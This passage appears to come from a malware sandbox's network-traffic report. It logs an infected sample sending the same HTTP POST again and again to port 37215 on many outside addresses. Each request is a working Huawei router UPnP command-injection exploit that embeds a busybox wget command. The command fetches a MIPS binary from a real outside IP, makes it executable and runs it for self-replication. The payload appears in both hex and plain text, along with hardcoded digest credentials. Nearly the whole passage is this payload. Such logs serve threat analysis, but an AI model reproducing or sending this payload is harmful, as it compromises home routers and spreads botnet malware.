2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1876192.168.2.1358502157.19.138.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.648339987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1877192.168.2.1344210197.231.235.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.648435116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1878192.168.2.1336038197.60.169.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.648489952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1879192.168.2.135734441.167.245.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.648857117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1880192.168.2.135629241.13.87.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.649434090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1881192.168.2.1343386197.17.80.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.649934053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1882192.168.2.134739641.71.121.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.649979115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1883192.168.2.1355632204.232.158.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.650018930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1884192.168.2.1336244157.33.110.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.650058985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1885192.168.2.1356082197.241.153.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.650127888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1886192.168.2.1341824157.14.87.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.650556087 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
